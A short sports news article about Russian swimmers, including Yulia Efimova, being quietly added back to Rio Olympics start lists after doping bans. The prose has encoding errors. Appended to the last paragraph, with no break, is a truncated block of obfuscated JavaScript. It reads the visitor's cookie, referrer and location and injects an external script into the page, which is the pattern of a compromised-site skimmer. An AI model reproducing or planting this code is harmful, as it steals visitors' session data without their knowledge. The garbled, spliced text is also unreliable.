Russian athletes being added back to the list after initial suspension for banned drug intake.

On Saturday, for the womenas 100 butterfly, the name of Natalia Novtcova was not to be read on the list. But a revised list just at the brink of preliminaries, her name was included to the last of six heats. Later on she managed to finish on 26th overall rank and unfortunately couldnat make it to the semifinals.

After Nataliaas inclusion, it is also being expected that Vladimir Morozov, Nikita Lobintsev, Daria Ustinova, Mikhail Dovgalyuk and Anastasia Krapivina will compete after the initial ban. FINA has not given any official word on this but it seems as if the swimmers are quietly being added to the lists and will compete in Rio Olympics.

Yulia Efimova

Yulia Efimova was also added after initial ban. As announced by FINA, Efimova will compete in the 100 meter breaststroke. She is also expected to participate for 200 meter breaststroke as well as the 4 * 100 medley relay. After a 16 month suspension for doping, she tested positive again for the banned substance meldonium.

IOC decided not to throw the entire Russian team out of the Olympics. Efimova was initially banned alongside six other swimmers after they test positive in the drug test or were found guilty under the state sanctioned doping scheme. omponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
